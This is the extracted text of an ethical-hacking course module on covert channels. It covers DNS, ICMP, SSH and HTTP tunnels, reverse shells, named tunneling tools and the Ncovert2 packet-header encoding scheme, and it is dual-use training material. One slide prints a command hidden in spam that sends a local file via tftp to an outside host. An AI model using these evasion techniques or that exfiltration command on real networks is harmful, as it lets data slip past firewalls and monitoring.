Ethical HackingVersion 5

Module 24

Covert Hacking

EC-Council

Insider Attacks

� Insider attacks are attacks initiated from inside-out

� Inside-Out attacks try to initiate network connections from the trusted (corporate) to the untrusted (Internet) network

� These techniques are used to evade firewall filters

OutsiderInsider

EC-Council

What is Covert Channel?

�A Covert channel is a mechanism for sending and receiving information data between machines without alerting any firewalls and IDS’s on the network

�The technique derives its stealthy nature by virtue of the fact that it sends traffic through ports that most firewalls will permit through

xx xxNetwork Firewall Internet

Attacker

EC-Council

Security Breach

� A covert channel has a security breach because it involves a trusted insider who is sending information to an unauthorized outsider in a covert fashion.

� For example, an employee wants to let an outsider know if his company won a big contract

� The two could come up with a scheme to communicate this information secretly

EC-Council

Why Do You Want to Use Covert Channel?

� Transfer a file from a Victim machine to a hacker machine

� Transfer a file from hacker machine to victim machine

� Launch applications at victim machine

� Interactive remote control access from hacker machine to victim machine

� Bypass any corporate filtered firewall rules

� Bypass corporate proxy server content filters

EC-Council

Motivation of a Firewall Bypass?

• Surfing to filtered websites (e.g. www.certifiedhacker.com)

• Listening Internet radio

• Chatting to Internet friends

• Administration of home webservers via SSH

• Uploading and downloading of special files (EXE, ZIP) which are filtered by the corporate content filter policy

• Using peer-to-peer techniques

� Who wants to bypass the firewall policy?

• Advanced users from the internal network

• Disgruntled employees

• Hackers

EC-Council

Covert Channels Scope

EC-Council

Covert Channel: Attack Techniques

1. Implementing hacker-code within the optional fields of an internet-allowed protocol

• DNS tunnel, ICMP tunnel

2. Tunneling hacker-payload within the request and response of an internet allowed protocol

• HTTP tunnel, E-Mail tunnel

3. Running other protocols on the desired ports than normally assigned

• For example running IRC on port 80 (http)

4. Misusing internet-allowed protocols

• Proxy connect method

EC-Council

Simple Covert Attacks

� Simple covert attacks use direct channels to communicate to the Internet

� Direct Channels• ACK tunnel

• TCP tunnel (pop, telnet, ssh)

• UDP tunnel (syslog, snmp)

• ICMP tunnel

• IPSEC, PPTP

EC-Council

Simple Covert Attacks

xx xx xx xx

Network Firewall InternetCorporateAttacker

EC-Council

Advanced Covert Attacks

� Advanced covert attacks use proxified channels to communicate on the Internet

� Proxified Channels

• Socks SSL tunnel

• HTTP/S tunnel (payload of http = tunnel)

• HTTP/S proxy CONNECT method tunnel

• DNS tunnel

• FTP tunnel

• Mail tunnel

EC-Council

Advanced Covert Attacks

xx xx xx xx

Network DMZ Proxy InternetCorporateAttacker

LAN Proxy

EC-Council

Standard Direct Connection

Victim ServerAttacker

EC-Council

Reverse Shell (Reverse Telnet)

Victim ServerAttacker

EC-Council

Direct Attack Example

xx

xxxx xx

xxxx

xx

xxxx xx

xx

xx

Buffer Overflow is an example of direct attack

Web Server Request

Passed by the Firewall

Reverse Shell is Established

Hacker controlled hostInternalNetwork

EC-Council

In-Direct Attack Example

xxxx

xx

xxxx xx

xx

xx

Port Blocked byFirewall

INSIDERRemote Control Indirect Attack

Web Server Request

BLOCKED by the Firewall

Reverse Shell is Established

Hacker controlled hostInternalNetwork

EC-Council

Reverse Connecting Agents

� Reverse connecting agents can be installed by:• E-Mail (Attachments, HTML social engineering)

• Downloaded from the Web

• CD-ROM Autostart program

• ZIP drives

• USB-Stick

• IPOD Drives

EC-Council

Covert Channel Attack Tools

� Netcat

� DNS tunnel

� SSH reverse tunnel

� HTTP/S tunnel

� HTTPS proxy CONNECT method tunnel

� ICMP tunnel

EC-Council

Netcat

� Netcat is the most popular tool for reverse shell exploits

� Widely used as payload in buffer overflows

EC-Council

DNS Tunneling

� The data is tunneled through DNS traffic

� How it works: The client does DNS lookups for a host in the delegated domain. Ifthe server wants to connect it responds with a 'key' IP address. The client then starts a shell in a pipe and feeds the output of the shell (in the form of DNS queries) to the server.

xxxx

xxxx xx xx

xx

xx xx

xxxx

xx

EC-Council

Covert Channel Using DNS Tunneling

Client ServerPoll

Poll

Poll

Commands

Execute

Commands

Commands

1. POLL2. GET FILE TO

CLIENT3. PUT FILE TO

SERVER4. EXECUTE

@CLIENT5. EXIT CLIENT

EC-Council

DNS Tunnel Client

� The DNS Tunnel Client is a tool that uses DNS queries to build up a tunnel to the DNS Tunnel Server which is located on the Internet

� When the tunnel is established successfully you have the capability to remote control your computer over the web site of the DNS Tunnel Server

EC-Council

DNS Tunneling Countermeasures

� Separate internal from external DNS

� Apply Firewall rule: Allow DNS from internal http proxy servers only

� Apply Firewall rule: Deny all other DNS packets

EC-Council

Covert Channel Using SSH

�Assuming SSH is allowed by the Firewall, establish a SSH connection from inside-out

�Use this connection to gain access to the internal systems

xx xxxx

xxxx xx

xx

xx

EC-Council

Covert Channel using SSH (Advanced)

�Use SSL if proxy server is used internally and content filtering is enabled

xx xxxx

xxxx xx

xx

xx xxxx

xx

EC-Council

HTTP/S Tunneling Attack

� Establish inside-out connection using http POST request (port 80 is usually allowed)

xx xxxx

xxxx xx xx

Web Server

Corporate LAN InternetHTTP/S Proxy

Content FilteringEnabled

1. Data is sent using http + applets

2. SSH is established from the web server to hacker machine

Victim

xxxx

xx HTTP ProxyHttp, https, ftp

xx

EC-Council

Covert Channel Hacking Tool: Active Port Forwarder

� Active port forwarder is a software tool for secure port forwarding.It uses SSL to increase security of communication between a server and a client

� This tool can be used to bypass firewalls

EC-Council

Covert Channel Hacking Tool: CCTT

� CCTT (Covert Channel Tunneling Tool) enables the creation of communication channels through NACS to create data streams which can :

• Establish an external server shell from within the internal network

• Establish a shell from a box located within the internal network to an external server

• Establish a TCP/UDP/HTTP CONNECT | POST channel allowing TCP data streams (ssh, smtp, pop, etc...) between an external server and a box from within the internal network

EC-Council

Covert Channel Hacking Tool: Firepass

� Firepass - is a tunneling tool, allowing to bypass firewall restrictions and encapsulate data flows inside legal ones to use HTTP POST requests

� TCP or UDP based protocols may be tunneled with Firepass

EC-Council

Covert Channel Hacking Tool: MsnShell

� MsnShell is a covert channel tunneling tool that allows you to remotely control a Linuxcomputer protected by a firewall

� MsnShell encapsulates shell commands and responses within the MSN protocol

• Establish a shell from a box located within the internal network to an external server

• Encapsulate shell commands and responses within the MSN protocol (SHELL over MSN)

• Supports HTTP proxy (SHELL over MSN over HTTP)

EC-Council

Covert Channel Hacking Tool: Web Shell

� "Web Shell" is a remote UNIX/WIN shell, that tunnels packets viaHTTP/HTTPS

� The client component provides shell-like prompt, encapsulating user commands into HTTP POST requests and sending them to the server part script on the target web server directly or via HTTP proxy server

� The server part extracts and executes commands from HTTP post requests and returns STDOUT and STDERR output as HTTP response messages

• SSL support

• Command line history support

• File upload/download

EC-Council

Covert Channel Hacking Tool: NCovert

� Ncovert is an open-sourced program designed to function as a TCP covert channel

� It is a file transfer system that uses the TCP protocol to covertly move data from one system to another

� NCovert uses spoofing techniques to hide the source of communications and the data that travels over the network

� The technique essentially creates a covert channel for communications by hiding four characters of data in the header's initial sequence number (ISN) field

EC-Council

Ncovert - How it works

� Sender sends SYN packet with data in ISN to public server, forges source IP as receiver's IP

� Public server receives SYN, sends SYN/ACK to receiver's machine

� Receiver's machine sniffs the packet and extracts the data, the OS sends a RST to public server

� This process is repeated until all data is sent

EC-Council

Ncovert2 - How it works - Part 1

1. Sender and receiver agree on shared secret, turned into SHA-1

2. Sender generates random session key and creates IPID and source port from SHA-1 and session key

3. Sender XORs file size and session key to create ISN

4. The first packet is sent to port 80 with session key in IPID andsource port file size in ISN

5. Receiver sniffs for packet for destination address with destination port 80

6. Receiver extracts session key from IPID and source port using SHA-1 hash

7. Receiver extracts file size from ISN using session key

8. Sender and receiver generate session hash from session key and SHA-1 password hash for creating predictable source ports

EC-Council

Ncovert2 - How it works - Part 2

9. Sender XORs data with previous ISN and session hash to create new ISN, creates a packet with a random IP ID, the “predictable” sourceport, and new ISN, and sends the packet

10. Sender also sends decoy packets as well11. Destination ports on legit and decoy packets randomly use 1-65535,

repeating as needed12. Receiver sniffs packets, ignores packets without “predictable”

destination ports, uses previous ISN and session hash to extract data13. Packets sent until all data is transmitted14. Source address is only required on the first packet, so source

addresses can be changed to something “random”, including decoy packets

15. Transmission should look like a TCP ping to port 80 followed by afull port scan, with random source addresses

EC-Council

Covert Channel Hacking via Spam E-mail Messages

� Covert channel communication via spam messages is difficult to detect because of the means of delivery

� By using keyword or phrase- based communication with the back door system, the email appears to be ordinary spam

� This text can be varied by attacker specification

� This makes detection via standard intrusion detection methods virtually impossible

� The client and server component can exchange information by simply sending spam e-mail messages

EC-Council

Covert Channel Hacking via Spam E-mail Messages

� Hiddenembeddedcommand inside the spam e-mail:

� tftp –I 10.0.0.6c:\conf\abc.dat send.dat

EC-Council

Hydan

� Hydan steganographically conceals a message into an application without altering the file size

� It exploits redundancy in the i386 instruction set by defining sets of functionally equivalent instructions It then encodes information in machine code by using the appropriate instructions from each set

� This tool can be used for covert communication

� http://crazyboy.com/hydan